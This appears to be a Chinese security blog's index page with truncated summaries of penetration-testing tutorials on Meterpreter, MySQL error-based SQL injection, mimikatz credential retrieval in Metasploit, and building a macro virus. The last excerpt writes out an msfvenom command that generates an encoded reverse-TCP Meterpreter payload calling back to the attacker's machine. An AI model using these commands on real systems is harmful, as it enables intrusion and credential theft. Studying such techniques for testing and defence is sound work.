摘要:
在Metasploit Framework中,Meterpreter是一种后渗透工具,它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注入”理念实现的,它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。 其中,攻击者与目标 阅读全文
摘要:
函数报错注入 MySQL在5.1.5版本后开始提供在XML文档中按照xpath语法来查询节点内容的函数extractvalue()和对查询到的节点内容进行修改操作的函数updatexml()。 语法如下: extractvalue(xml文档对象,xml路径) updatexml(xml文档对象,x 阅读全文
摘要:
msf > load mimikatz 加载msf中自带的mimikatz模块,需要administrator或者system权限 help mimikatz——查看进程用法 kerberos:kerberos相关的模块 livessp:尝试检索livessp凭据 mimikatz_command: 阅读全文
摘要:
1.宏病毒制作 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=Kali的IP LPORT=Kali监听的端口 -e x86/shikata_ga_nai -i 10 -f vba-exe 会生成 阅读全文